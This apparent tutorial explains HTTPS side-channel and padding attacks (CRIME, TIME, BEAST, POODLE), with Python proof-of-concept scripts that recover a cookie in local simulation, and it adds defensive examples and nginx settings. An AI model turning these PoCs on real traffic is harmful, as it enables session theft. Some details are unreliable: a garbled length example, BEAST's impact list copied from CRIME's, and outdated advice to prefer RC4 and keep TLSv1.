Common HTTPS attack methods compiled by experts


Background

Study common HTTPS attack methods (BEAST, CRIME, BREACH) and, based on the features of HTTPS, put forward some suggestions for deploying it securely.

HTTPS attacks are mostly carried out from a man-in-the-middle position. They are mainly side-channel attacks that exploit the compression algorithm used by HTTPS and the CBC encryption mode. The prerequisites are demanding: the victim host must be made to send many requests so that enough information is collected to decrypt the key data.

Common attack methods include BEAST, Lucky-13, RC4 Biases, CRIME, TIME and BREACH. This section mainly introduces three of them.

CRIME

Compression Ratio Info-leak Made Easy

Attack principles

Attackers make the victim send a large number of requests, exploit the compression algorithm to guess the key information in the request, and judge whether a guess is correct from the response length.

The following is an HTTPS request in which the GET address is attacker-controlled and the Cookie is the secret. The attacker only needs to keep changing the guess string in the GET address.

GET /sessionid=a HTTP/1.1
Host: bank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Cookie: sessionid=d3b0c44298fc1c149afbf4c8996fb924

For example, the Response length is 1000 bytes.

GET /sessionid=d HTTP/1.1
Host: bank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Cookie: sessionid=d3b0c44298fc1c149afbf4c8996fb924

When the attacker guesses the first letter of the cookie correctly, the compressor encodes the repeated text as a back-reference and the Response length drops to 9999 bytes.

After the Response is encrypted by SSL, the length is preserved exactly if RC4 is used; with CBC mode the length may change slightly because of padding.

Affected compression algorithms

Deflate = LZ77 + Huffman coding
GZip = headers + data compressed using Deflate

Attack prerequisites

Attackers can observe the victim's network traffic (man-in-the-middle attack, ISP).

The browser and the server both support and use a compression algorithm.

Attackers can make the victim send a large number of requests and control the request content.

Defense methods

The client can upgrade the browser to avoid such attacks.

Chrome: 21.0.1180.89 and above
Firefox: 15.0.1 and above
Opera: 12.01 and above
Safari: 5.1.7 and above

The server can disable TLS compression to prevent such attacks.

Apache

• SSLCompression off

• GnuTLSPriorities: include !COMP-DEFLATE in the priority string

Prohibit requests that are too frequent.

Change the compression flow so that user-supplied data is not compressed.

Add random junk data of unpredictable length.
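The last two mitigations can be made concrete with an added Python 3 example (not code from the original page). It compresses a constructed request, containing a constructed sample cookie, three ways: as one DEFLATE stream (the vulnerable case), with the attacker-influenced URL left uncompressed and only the fixed part compressed, and with the compressed output padded up to a fixed bucket. The request text, the cookie value and the 256-byte bucket size are all assumptions chosen for the illustration.

```python
import zlib

# Constructed sample: the secret value carried in the victim's request
SECRET_COOKIE = b"secret=d3b0c44298fc1c149afbf4c8996fb924"


def compress_bytes(data: bytes) -> bytes:
    c = zlib.compressobj()
    return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)


def request(attacker_part: bytes) -> tuple:
    """Split a constructed request into the attacker-influenced part (the URL)
    and the fixed part that carries the secret."""
    controlled = b"GET /?q=" + attacker_part + b" HTTP/1.1\r\n"
    fixed = b"Cookie: " + SECRET_COOKIE + b"\r\n\r\n"
    return controlled, fixed


def leaky_length(attacker_part: bytes) -> int:
    # Vulnerable: one DEFLATE stream over everything. A URL that repeats the
    # cookie prefix is encoded as a back-reference, so the output shrinks.
    controlled, fixed = request(attacker_part)
    return len(compress_bytes(controlled + fixed))


def separated_length(attacker_part: bytes) -> int:
    # Mitigation: user-influenced data is never compressed; only the fixed part is.
    # The attacker's bytes can no longer match against the secret.
    controlled, fixed = request(attacker_part)
    return len(controlled) + len(compress_bytes(fixed))


def bucketed_length(attacker_part: bytes, bucket: int = 256) -> int:
    # Mitigation: pad the compressed output up to the next bucket boundary so a
    # change of a few bytes is no longer observable on the wire.
    n = leaky_length(attacker_part)
    return -(-n // bucket) * bucket


def length_delta(measure, right: bytes, wrong: bytes) -> int:
    """Bytes saved by a correct guess over a wrong one under a given scheme.
    A positive value is an observable side channel; zero means nothing leaked."""
    return measure(wrong) - measure(right)


if __name__ == "__main__":
    for name, fn in (("single stream", leaky_length),
                     ("secret compressed separately", separated_length),
                     ("padded to 256-byte buckets", bucketed_length)):
        print(f"{name:30s} delta = {length_delta(fn, b'secret=d', b'secret=x')}")
```

With the single stream the correct guess never costs more than the wrong one, which is exactly the signal the PoC below relies on; the separated and bucketed variants give a delta of zero for this input. Bucketing hides small differences only within a bucket, so it is a mitigation, not a proof of independence, whereas keeping attacker-controlled bytes out of the compressed stream removes the cross-matching entirely.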

Impact scope

TLS 1.0.
SPDY protocol (Google).
Applications that use TLS compression.
Mozilla Firefox (older versions) that support SPDY.
Google Chrome (older versions) that supported both TLS compression and SPDY.

POC

This PoC does not simulate a real man-in-the-middle attack; it verifies the feasibility of the CRIME idea in Python by compressing the victim's request locally.

import string
import zlib
import random

charset = string.ascii_letters + string.digits

# The secret the simulation tries to recover; generated at random so the result can be checked.
COOKIE = ''.join(random.choice(charset) for _ in range(30))

# The victim's request as the compressor sees it (Python 3; CRLF line endings restored).
HEADERS = ("POST / HTTP/1.1\r\n"
           "Host: thebankserver.com\r\n"
           "Connection: keep-alive\r\n"
           "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
           "Accept: */*\r\n"
           "Referer: https://thebankserver.com/\r\n"
           "Cookie: secret=" + COOKIE + "\r\n"
           "Accept-Encoding: gzip,deflate,sdch\r\n"
           "Accept-Language: en-US,en;q=0.8\r\n"
           "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
           "\r\n")
# Attacker-controlled body: repeats the headers up to the cookie prefix so that the
# guess is compressed together with the real cookie.
BODY = ("POST / HTTP/1.1\r\n"
        "Host: thebankserver.com\r\n"
        "Connection: keep-alive\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
        "Accept: */*\r\n"
        "Referer: https://thebankserver.com/\r\n"
        "Cookie: secret=")
cookie = ""   # bytes recovered so far


def compress(data):
    c = zlib.compressobj()
    return c.compress(data.encode()) + c.flush(zlib.Z_SYNC_FLUSH)


def getposset(perchar, chars):
    # Candidates whose extra byte does not grow the compressed length (it matched the cookie).
    posset = []
    baselen = len(compress(HEADERS + perchar))
    for i in chars:
        t = len(compress(HEADERS + perchar + i))
        if t <= baselen:
            posset.append(i)
    return posset


def doguess():
    global cookie
    while len(cookie) < 30:
        posset = getposset(BODY + cookie, charset)
        trun = 1
        tem_posset = posset
        # Several candidates tie: shorten the injected prefix until one survives
        # (stop once the body is used up).
        while 1 < len(posset) and trun <= len(BODY):
            tem_body = BODY[trun:]
            posset = getposset(tem_body + cookie, tem_posset)
            trun = trun + 1
        if len(posset) == 0:
            return False
        cookie += posset[0]
        print(posset[0])
    return True


while BODY.find("\r\n") >= 0:
    if not doguess():
        print("(-) Change body")
    BODY = BODY[BODY.find("\r\n") + 2:]
print("(+) original cookie " + COOKIE)
print("(+) gotten cookie " + cookie)

TIME

Timing Info-leak Made Easy

Attack principles

Attackers make the victim send a large number of requests, exploit the compression algorithm to guess the key information in the request, and judge whether a guess is correct from the response time. TIME and CRIME both exploit the compression algorithm, but CRIME uses length information as the side channel while TIME uses timing information.


When the data length is greater than the MTU, the data is split into two packets for sending, which produces a large time difference. Attackers keep the packet length around the MTU and keep trying to guess the COOKIE.

Padding is added to bring the packet size up to exactly the MTU. In Case 1 the extraByte that was added overlaps with the data being guessed, so because of compression the packet length does not grow; in Case 2 extraByte differs from the data being guessed, the length grows and the response is split into two packets. The two cases can be told apart by their response times.

Attack prerequisites

Attackers can make the victim send a large number of requests and control the request content.

Stable network environment.

Defense methods

Add a short random delay to the response decryption process.

Block frequent requests within a short period of time.

BEAST

Browser Exploit Against SSL/TLS

Attack principles

Attackers make the victim send a large number of requests and exploit the CBC encryption mode to guess key information.

In CBC mode, block i is XORed with the ciphertext of block i-1 before it is encrypted. More formally:

Ci = E(Key, Ci-1 ⊕ Mi)

Obviously, when the first block is encrypted there is no previous ciphertext block to XOR with. The standard practice is therefore to generate a random initialization vector (IV) and XOR it with the first plaintext block. The first block M0 is encrypted as:

C0 = E(Key, IV ⊕ M0)

Then the second block M1 is encrypted as:

C1 = E(Key, C0 ⊕ M1)

Now, unless C0 happens to equal the IV (which is extremely unlikely), the two inputs to the encryption function differ even if M0 = M1, so C0 ≠ C1. CBC has two basic usage methods:

1. Each record is treated independently; an IV is generated for each record.

2. All records are treated as one large object chained together, and the CBC state is carried over between records. This means that the IV of record n is the last ciphertext block of record n-1.

SSL 3.0 and TLS 1.0 chose the second usage. This seems to be a mistake, and it is where the security problem of the encryption scheme comes from.
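To make the two usage methods concrete, here is an added Python 3 example (not from the original page) that implements the CBC equations above and both record-handling modes. The block cipher E(Key, ·) is replaced by a keyed hash truncated to one block, an assumption made only so that the code runs without a crypto library; it is deterministic and key-dependent, which is all the chaining argument needs (it is not invertible, so the example encrypts only). Keys, IVs and records are constructed sample values.

```python
import hashlib
import os

BLOCK = 16


def toy_block_cipher(key: bytes, block: bytes) -> bytes:
    """Stand-in for E(Key, .): a keyed hash truncated to one block (not a real cipher)."""
    assert len(block) == BLOCK
    return hashlib.sha256(key + block).digest()[:BLOCK]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Ci = E(Key, C(i-1) xor Mi) with C(-1) = IV; plaintext must be block-aligned."""
    assert len(plaintext) % BLOCK == 0
    prev, out = iv, []
    for off in range(0, len(plaintext), BLOCK):
        prev = toy_block_cipher(key, xor(prev, plaintext[off:off + BLOCK]))
        out.append(prev)
    return b''.join(out)


def encrypt_records_chained(key: bytes, iv: bytes, records: list) -> list:
    """Usage 2 (SSL 3.0 / TLS 1.0): one CBC stream across records. Record n's IV is
    the last ciphertext block of record n-1, so it is public before record n is sent."""
    out, prev = [], iv
    for rec in records:
        c = cbc_encrypt(key, prev, rec)
        out.append(c)
        prev = c[-BLOCK:]
    return out


def encrypt_records_fresh_iv(key: bytes, records: list) -> list:
    """Usage 1 (TLS 1.1 and later): a fresh random IV per record, sent with the record."""
    out = []
    for rec in records:
        iv = os.urandom(BLOCK)
        out.append((iv, cbc_encrypt(key, iv, rec)))
    return out


def same_blocks_encrypt_differently(key: bytes) -> bool:
    # M0 == M1, yet C0 != C1 because block 1 is chained through C0
    m = b'A' * BLOCK
    c = cbc_encrypt(key, os.urandom(BLOCK), m + m)
    return c[:BLOCK] != c[BLOCK:]


def chained_iv_is_predictable(key: bytes, iv: bytes, records: list) -> bool:
    # With chaining, record 1 is encrypted exactly as if its IV were the last block of
    # record 0, a value already visible on the wire: the property BEAST relies on.
    cts = encrypt_records_chained(key, iv, records)
    return cbc_encrypt(key, cts[0][-BLOCK:], records[1]) == cts[1]


def fresh_iv_hides_repetition(key: bytes, record: bytes) -> bool:
    # The same record sent twice yields different ciphertexts and an IV nobody saw in advance.
    (iv1, c1), (iv2, c2) = encrypt_records_fresh_iv(key, [record, record])
    return iv1 != iv2 and c1 != c2
```

The per-record IV of usage 1 is what TLS 1.1 introduced as the explicit IV field, and it is why the defence below recommends TLS 1.1 or later rather than a patch to TLS 1.0.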

Attackers can replace the data block to be guessed with:

X ⊕ Ci-1 ⊕ P

where X is the ciphertext block immediately before the injected block. When the injected block is encrypted, CBC XORs it with X, which cancels out, so the plaintext block fed to the encryption algorithm is:

Ci-1 ⊕ P

If P = Mi, the new ciphertext block is identical to Ci, which means the guess is correct.

Attack prerequisites

Attackers can observe the victim's network traffic (man-in-the-middle attack, ISP).

Attackers need enough access to insert their own data into the SSL/TLS session alongside the sensitive data.

Attackers need to locate exactly the ciphertext blocks that carry the sensitive data.

Attackers can make the victim send a large number of requests and control the request content.

Defense methods

Use RC4 instead of CBC mode.

Deploy TLS 1.1 or later to avoid the security issues of SSL 3.0/TLS 1.0.

Change the encryption key after every fixed number of bytes transmitted by the server.

Impact scope

TLS 1.0.
SPDY protocol (Google).
Applications that use TLS compression.
Mozilla Firefox (older versions) that support SPDY.
Google Chrome (older versions) that supported both TLS compression and SPDY.

POC

The PoC only simulates the attack idea in Python, and only guesses the first byte of the cookie.

import string
import random
from Crypto.Cipher import AES   # pycryptodome (drop-in for the pycrypto import used here)

KEY = b'lyp62/22sh2rlxjf'   # 16-byte AES key standing in for the TLS record key
IV = b'0' * 16              # AES-CBC requires a 16-byte IV
charset = string.ascii_letters + string.digits
cookie = ''.join(random.choice(charset) for _ in range(30))   # secret to recover
HEADERS = ("POST / HTTP/1.1\r\n"
           "Host: thebankserver.com\r\n"
           "Connection: keep-alive\r\n"
           "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
           "Accept: */*\r\n"
           "Referer: https://thebankserver.com/\r\n"
           "Cookie: secret=" + cookie + "\r\n"
           "Accept-Encoding: gzip,deflate,sdch\r\n"
           "Accept-Language: en-US,en;q=0.8\r\n"
           "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
           "\r\n").encode()


def add_padding(plaintext):
    # PKCS#7-style padding up to a multiple of the 16-byte block size
    pad_num = 16 - len(plaintext) % 16
    return plaintext + bytes([pad_num]) * pad_num


def check_padding(plaintext):
    pad_num = plaintext[-1]
    return 1 <= pad_num <= 16 and plaintext[-pad_num:] == bytes([pad_num]) * pad_num


def encrypto(plaintext):
    # Fixed key and IV: models the record layer of one session as the attacker sees it
    return AES.new(KEY, AES.MODE_CBC, IV).encrypt(add_padding(plaintext))


def decrypto(ciphertext):
    plaintext = AES.new(KEY, AES.MODE_CBC, IV).decrypt(ciphertext)
    return plaintext[:-plaintext[-1]] if check_padding(plaintext) else None


def findcookie():
    return HEADERS.find(b'secret=') + 7   # offset of the first cookie byte


pos_cookie = findcookie()
# Insert 'A's so that the first cookie byte becomes the last byte of block i, which
# starts at pos_block_s; the other 15 bytes of that block are known ('A').
pos_block_s = pos_cookie + 16 - pos_cookie % 16
HEADERS = HEADERS[:pos_cookie] + b'A' * (16 - pos_cookie % 16 + 15) + HEADERS[pos_cookie:]
encry_head = encrypto(HEADERS)
per_per_block = encry_head[pos_block_s - 16:pos_block_s]   # C(i-1)
per_block = encry_head[pos_block_s:pos_block_s + 16]       # Ci = E(C(i-1) xor ('A'*15 + cookie[0]))
aft_block = encry_head[pos_block_s + 16:pos_block_s + 32]  # C(i+1)
for i in charset:
    guess_block = b'A' * 15 + i.encode()
    # Inject Ci xor C(i-1) xor guess right after block i. CBC xors it with Ci before
    # encryption, so the cipher input is C(i-1) xor guess: the same as block i's input
    # when the guess is right, in which case the following block re-encrypts to the
    # original C(i+1).
    insert_block = bytes(a ^ b ^ c for a, b, c in zip(per_block, per_per_block, guess_block))
    temp_header = HEADERS[:pos_block_s + 16] + insert_block + HEADERS[pos_block_s + 16:]
    encry_temp_header = encrypto(temp_header)
    if aft_block == encry_temp_header[pos_block_s + 32:pos_block_s + 48]:
        print("(+) first byte is: " + i)
        print("(+) original cookie: " + cookie)

POODLE

The attacker first uses a downgrade attack to make the browser fall back to SSL v3.0, and then steals plaintext transmitted by the user through the defects of the SSL v3.0 CBC mode.

Downgrade attack

SSL v3.0 is a protocol that has existed for a long time. Most browsers still support it for compatibility, although it is not their first choice; a man-in-the-middle attacker can reject the browser's attempts to negotiate a higher protocol version and only allow SSL v3.0.

Padding Oracle attack

Earlier CBC attacks such as BEAST and Lucky-13 provide the background.

First, look at the CBC-mode encryption and decryption process.

Decryption process

Encryption process

Verification process

MAC1 = hash(plaintext)

Ciphertext = Encode(plaintext + MAC1 + Padding, K)
plaintext = Decode(ciphertext, K) − MAC1 − Padding (the padding length is given by the last byte)

MAC2 = hash(plaintext); if MAC1 == MAC2 the verification succeeds, otherwise it fails.

Padding Oracle attacks generally follow a "know two, derive the third" rule over the following three values, as shown in the figure below.

(1) IV

(2) the decrypted data, called midText

(3) Plaintext

If we have two of these three values we can derive the third, because they are related by XOR.

In the POODLE attack, the last data block is replaced with the data block we want to guess, as shown in the following figure.

The direct consequence is that the CBC integrity check fails and the packet is rejected. We assume that the last data block consists entirely of padding (in practice the packet length can be controlled to achieve this, for example by increasing the length of the path).

Then the CBC integrity check passes only when Plaintext[7] == 7 (for an 8-byte block; 15 for a 16-byte block). If the value is not 7, more or fewer padding bytes are stripped, the MAC is read from the wrong position and the verification fails.

So we only need to keep changing the last byte of (1) the IV until (3) the last byte of the Plaintext is 7 (the CBC check passes); then we can derive (2) the last byte of midText.

POODLE: Padding Oracle On Downgraded Legacy Encryption. Prerequisites: low-version SSL, man-in-the-middle, a large number of packets, CBC mode.

BEAST: text-based side-channel attack. Prerequisites: low-version SSL, man-in-the-middle, a large number of packets, controllable transmission content, CBC mode.

Lucky-13: time-based side-channel attack. Prerequisites: response time, a large number of packets, controllable transmission content.

RC4 Biases. Prerequisites: response time, a large number of packets, controllable transmission content, RC4 mode.

Security Configuration suggestions

The security configuration below uses nginx as an example; it is mainly set in nginx.conf.

Use secure SSL/TLS protocol versions.

ssl_protocols TLSv1 TLSv1.1 TLSv1.2;

Use a strict cipher suite list.

ssl_ciphers 'ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES128-SHA256:ECDHE-RSA-AES256-SHA:ECDHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA256:DHE-RSA-AES128-SHA256:DHE-RSA-AES256-SHA:DHE-RSA-AES128-SHA:ECDHE-RSA-DES-CBC3-SHA:EDH-RSA-DES-CBC3-SHA:AES256-GCM-SHA384:AES128-GCM-SHA256:AES256-SHA256:AES128-SHA256:AES256-SHA:AES128-SHA:DES-CBC3-SHA:HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4';

Prefer the server's cipher order.

ssl_prefer_server_ciphers on;

Enable HSTS.

add_header Strict-Transport-Security max-age=15768000;

Redirection configuration

server {
    listen 80;
    add_header Strict-Transport-Security max-age=15768000;
    return 301 https://www.yourwebsite.com$request_uri;
}

Use 2048-bit Diffie-Hellman parameters

openssl dhparam -out dhparam.pem 2048
ssl_dhparam /path/to/dhparam.pem;
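As an added check (example code, not part of the original page), the following Python 3 script reads an nginx server block and flags the settings this page warns about: SSLv3 or TLSv1 in ssl_protocols (POODLE, BEAST), RC4 or DES-CBC3 suites in ssl_ciphers, ssl_prefer_server_ciphers not on, and a missing HSTS header. The directive parser is a minimal line-based one and assumes one directive per line with no includes; the two server blocks are constructed samples, the first assembled from the directives above.

```python
# Constructed sample: the server block assembled from the directives above
PAGE_CONF = """
server {
    listen 443 ssl;
    ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
    ssl_ciphers 'ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-DES-CBC3-SHA:DES-CBC3-SHA:HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4';
    ssl_prefer_server_ciphers on;
    add_header Strict-Transport-Security max-age=15768000;
}
"""

# Constructed sample: a legacy configuration of the kind the attacks above target
WEAK_CONF = """
server {
    listen 443 ssl;
    ssl_protocols SSLv3 TLSv1;
    ssl_ciphers 'RC4-SHA:AES128-SHA:HIGH:!aNULL';
}
"""


def parse_directives(conf: str) -> dict:
    """Minimal nginx directive extractor: one 'name value;' per line.
    Assumption: no includes, no multi-line directives, no nested 'if' blocks."""
    out = {}
    for raw in conf.splitlines():
        line = raw.strip()
        if not line or line.startswith('#') or line.endswith('{') or line == '}':
            continue
        name, _, value = line.rstrip(';').partition(' ')
        out.setdefault(name, []).append(value.strip().strip('\'"'))
    return out


def audit_tls(conf: str) -> list:
    """Return (code, message) findings for the weaknesses discussed on this page."""
    d = parse_directives(conf)
    findings = []

    protocols = ' '.join(d.get('ssl_protocols', [])).split()
    if not protocols:
        findings.append(('PROTO', 'ssl_protocols not set; the nginx default may still allow TLSv1'))
    if 'SSLv3' in protocols or 'SSLv2' in protocols:
        findings.append(('SSL3', 'SSLv3 enabled: downgrade plus padding oracle (POODLE)'))
    if 'TLSv1' in protocols:
        findings.append(('TLS10', 'TLSv1 enabled: chained-IV CBC (BEAST); deploy TLS 1.1 or later'))

    cipher_string = ':'.join(d.get('ssl_ciphers', []))
    enabled = [c for c in cipher_string.split(':') if c and not c.startswith('!')]
    excluded = [c[1:] for c in cipher_string.split(':') if c.startswith('!')]
    if any('RC4' in c for c in enabled) or 'RC4' not in excluded:
        findings.append(('RC4', 'RC4 not excluded (RC4 biases)'))
    if any('DES' in c for c in enabled):
        # '!DES' removes single DES only; DES-CBC3 suites named explicitly stay enabled
        findings.append(('3DES', 'DES-CBC3 suites enabled; add !3DES and drop the explicit entries'))

    if d.get('ssl_prefer_server_ciphers', ['off'])[0] != 'on':
        findings.append(('ORDER', 'ssl_prefer_server_ciphers is not on'))
    if not any(v.startswith('Strict-Transport-Security') for v in d.get('add_header', [])):
        findings.append(('HSTS', 'no Strict-Transport-Security header'))
    return findings


def finding_codes(conf: str) -> set:
    return {code for code, _ in audit_tls(conf)}


if __name__ == '__main__':
    for label, conf in (('page config', PAGE_CONF), ('legacy config', WEAK_CONF)):
        print(label)
        for code, msg in audit_tls(conf):
            print(f'  [{code}] {msg}')
```

Run against the page's own directives the check reports two items: TLSv1 is still enabled, which the BEAST defence above argues against, and the explicitly listed DES-CBC3 suites survive the trailing !DES, since that keyword only removes single-DES suites.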
